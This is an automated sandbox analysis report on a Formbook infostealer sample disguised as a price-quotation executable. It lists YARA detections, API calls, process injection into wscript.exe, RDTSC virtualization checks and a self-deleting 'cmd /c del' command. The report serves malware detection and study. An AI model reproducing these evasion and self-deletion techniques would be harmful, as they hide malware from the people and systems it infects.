Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040312A

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00406354	0_2_00406354
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00404802	0_2_00404802
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00406B2B	0_2_00406B2B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333AA17	0_2_7333AA17
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333AA08	0_2_7333AA08
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401027	3_2_00401027
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041C966	3_2_0041C966
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B931	3_2_0041B931
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401208	3_2_00401208
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041BB7C	3_2_0041BB7C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041CBD9	3_2_0041CBD9
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00408C8B	3_2_00408C8B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00408C90	3_2_00408C90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041C5D1	3_2_0041C5D1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041A6B6	3_2_0041A6B6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB090	3_2_009EB090
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A91002	3_2_00A91002
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DF900	3_2_009DF900
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120	3_2_009F4120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B090	17_2_04C6B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11002	17_2_04D11002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6841F	17_2_04C6841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0	17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D21D55	17_2_04D21D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5F900	17_2_04C5F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C50D20	17_2_04C50D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C76E30	17_2_04C76E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8EBB0	17_2_04C8EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B931	17_2_00B4B931
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4C966	17_2_00B4C966
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4CBD9	17_2_00B4CBD9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4BB7C	17_2_00B4BB7C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B38C90	17_2_00B38C90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B38C8B	17_2_00B38C8B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B32D90	17_2_00B32D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4A6B6	17_2_00B4A6B6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B32FB0	17_2_00B32FB0

Source: C:\Windows\SysWOW64\wscript.exe

Code function: String function: 04C5B150 appears 32 times

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004185D0 NtCreateFile,	3_2_004185D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00418680 NtReadFile,	3_2_00418680
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00418700 NtClose,	3_2_00418700
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004187B0 NtAllocateVirtualMemory,	3_2_004187B0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004185CB NtCreateFile,	3_2_004185CB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041867A NtReadFile,	3_2_0041867A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004186FB NtClose,	3_2_004186FB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041872A NtClose,	3_2_0041872A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004187AA NtAllocateVirtualMemory,	3_2_004187AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_00A198F0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00A19860
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19840 NtDelayExecution,LdrInitializeThunk,	3_2_00A19840
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A199A0 NtCreateSection,LdrInitializeThunk,	3_2_00A199A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_00A19910
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A20 NtResumeThread,LdrInitializeThunk,	3_2_00A19A20
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_00A19A00
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A50 NtCreateFile,LdrInitializeThunk,	3_2_00A19A50
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A195D0 NtClose,LdrInitializeThunk,	3_2_00A195D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19540 NtReadFile,LdrInitializeThunk,	3_2_00A19540
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00A196E0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00A19660
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_00A197A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,	3_2_00A19780
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,	3_2_00A19FE0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,	3_2_00A19710
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A198A0 NtWriteVirtualMemory,	3_2_00A198A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19820 NtEnumerateKey,	3_2_00A19820
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A1B040 NtSuspendThread,	3_2_00A1B040
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A199D0 NtCreateProcessEx,	3_2_00A199D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19950 NtQueueApcThread,	3_2_00A19950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99840 NtDelayExecution,LdrInitializeThunk,	17_2_04C99840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_04C99860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C995D0 NtClose,LdrInitializeThunk,	17_2_04C995D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C999A0 NtCreateSection,LdrInitializeThunk,	17_2_04C999A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99540 NtReadFile,LdrInitializeThunk,	17_2_04C99540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_04C99910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C996D0 NtCreateKey,LdrInitializeThunk,	17_2_04C996D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_04C996E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A50 NtCreateFile,LdrInitializeThunk,	17_2_04C99A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99650 NtQueryValueKey,LdrInitializeThunk,	17_2_04C99650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_04C99660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99FE0 NtCreateMutant,LdrInitializeThunk,	17_2_04C99FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99780 NtMapViewOfSection,LdrInitializeThunk,	17_2_04C99780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99710 NtQueryInformationToken,LdrInitializeThunk,	17_2_04C99710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C998F0 NtReadVirtualMemory,	17_2_04C998F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C998A0 NtWriteVirtualMemory,	17_2_04C998A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9B040 NtSuspendThread,	17_2_04C9B040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99820 NtEnumerateKey,	17_2_04C99820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C999D0 NtCreateProcessEx,	17_2_04C999D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C995F0 NtQueryInformationFile,	17_2_04C995F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99950 NtQueueApcThread,	17_2_04C99950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99560 NtWriteFile,	17_2_04C99560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99520 NtWaitForSingleObject,	17_2_04C99520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9AD30 NtSetContextThread,	17_2_04C9AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A80 NtOpenDirectoryObject,	17_2_04C99A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99670 NtQueryInformationProcess,	17_2_04C99670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A00 NtProtectVirtualMemory,	17_2_04C99A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99610 NtEnumerateValueKey,	17_2_04C99610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A10 NtQuerySection,	17_2_04C99A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A20 NtResumeThread,	17_2_04C99A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C997A0 NtUnmapViewOfSection,	17_2_04C997A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A3B0 NtGetContextThread,	17_2_04C9A3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99760 NtOpenProcess,	17_2_04C99760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99770 NtSetInformationFile,	17_2_04C99770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A770 NtOpenThread,	17_2_04C9A770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99B00 NtSetValueKey,	17_2_04C99B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A710 NtOpenProcessToken,	17_2_04C9A710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99730 NtQueryVirtualMemory,	17_2_04C99730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B485D0 NtCreateFile,	17_2_00B485D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B48680 NtReadFile,	17_2_00B48680
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B487B0 NtAllocateVirtualMemory,	17_2_00B487B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B48700 NtClose,	17_2_00B48700
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B485CB NtCreateFile,	17_2_00B485CB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B486FB NtClose,	17_2_00B486FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4867A NtReadFile,	17_2_00B4867A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B487AA NtAllocateVirtualMemory,	17_2_00B487AA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4872A NtClose,	17_2_00B4872A

Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.269417802.000000000EABF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341516961.0000000000C5F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PRICE_REQUEST_QUOTATION.exe

Source: PRICE_REQUEST_QUOTATION.exe	Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File read: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Jump to behavior

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\nsn8CC7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/2@9/5

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,

0_2_00402053

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042C1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source:	Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Unpacked PE file: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B87C push eax; ret	3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B812 push eax; ret	3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B81B push eax; ret	3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041603B push eax; ret	3_2_0041603C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B148 pushad ; ret	3_2_0041B14B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004152B0 pushad ; retf	3_2_004152B8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004105D2 push ebp; ret	3_2_004105D3
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004156A7 push ss; ret	3_2_004156AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B7C5 push eax; ret	3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A2D0D1 push ecx; ret	3_2_00A2D0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CAD0D1 push ecx; ret	17_2_04CAD0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4603B push eax; ret	17_2_00B4603C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B812 push eax; ret	17_2_00B4B818
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B81B push eax; ret	17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B87C push eax; ret	17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B148 pushad ; ret	17_2_00B4B14B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B452B0 pushad ; retf	17_2_00B452B8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B405D2 push ebp; ret	17_2_00B405D3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B456A7 push ss; ret	17_2_00B456AA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B7C5 push eax; ret	17_2_00B4B818

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'			Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000B38614 second address: 0000000000B3861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000B389AE second address: 0000000000B389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 2244	Thread sleep time: -45000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 5540	Thread sleep time: -34000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,	0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00402671 FindFirstFileA,	0_2_00402671

Source: explorer.exe, 00000006.00000000.304126686.000000000DD44000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.66
Source: explorer.exe, 00000006.00000000.286630230.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.313086176.000000000374F000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
